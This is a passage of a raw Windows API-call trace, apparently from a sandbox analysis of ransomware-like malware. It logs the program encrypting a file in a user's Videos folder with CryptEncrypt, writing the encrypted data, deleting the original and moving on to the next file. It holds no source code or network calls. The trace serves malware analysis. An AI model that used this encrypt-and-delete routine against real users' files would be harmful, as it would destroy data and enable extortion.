hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0098.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0098.589] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.591] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x13b08, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x13b10) returned 1 [0098.591] CharLowerBuffW (in: lpsz="byte[80657]", cchLength=0xb | out: lpsz="byte[80657]") returned 0xb [0098.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.593] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49adb18*, pdwDataLen=0x144e538*=0x13b08, dwBufLen=0x13b10 | out: pbData=0x49adb18*, pdwDataLen=0x144e538*=0x13b10) returned 1 [0098.593] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.595] WriteFile (in: hFile=0x298, lpBuffer=0x4529b28*, nNumberOfBytesToWrite=0x13b10, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4529b28*, lpNumberOfBytesWritten=0x144ef3c*=0x13b10, lpOverlapped=0x0) returned 1 [0098.599] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca670, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0098.599] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0098.599] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.599] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.599] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0098.600] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0098.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.600] FreeLibrary (hLibModule=0x756e0000) returned 1 [0098.600] CloseHandle (hObject=0x258) returned 1 [0098.600] CloseHandle (hObject=0x298) returned 1 [0098.609] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv", lpFilePart=0x0) returned 0x36 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0098.609] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\e8q4unibqs8v.flv")) returned 0x20 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0098.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0098.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0098.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0098.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0098.610] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd412f2b0, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0x3ad28a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x3ad28a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x13b08, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="E8Q4uNIBQS8v.flv", cAlternateFileName="E8Q4UN~1.FLV")) returned 0x41ac180 [0098.610] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\e8q4unibqs8v.flv")) returned 1 [0098.660] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd412f2b0, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0x3ad28a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x3ad28a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x13b08, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="E8Q4uNIBQS8v.flv", cAlternateFileName="E8Q4UN~1.FLV")) returned 0 [0098.660] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0098.661] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0098.661] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0098.661] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0098.661] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0098.661] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0098.661] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0098.662] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0098.662] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.662] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0098.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.662] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0098.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0098.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x43150f0 [0098.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0098.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0098.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0098.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0098.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e00 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0098.665] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0098.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0098.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.665] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.665] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2b66ed0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0xeebbe170, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xeebbe170, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xcaef, dwReserved0=0x0, dwReserved1=0x8, cFileName="F0zOuSSpVPNmctC-N.swf", cAlternateFileName="F0ZOUS~1.SWF")) returned 0x41ac500 [0098.666] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0098.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0098.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0098.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0098.666] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0098.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0098.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0098.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0098.667] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0098.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0098.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0098.667] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0098.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0098.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0098.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 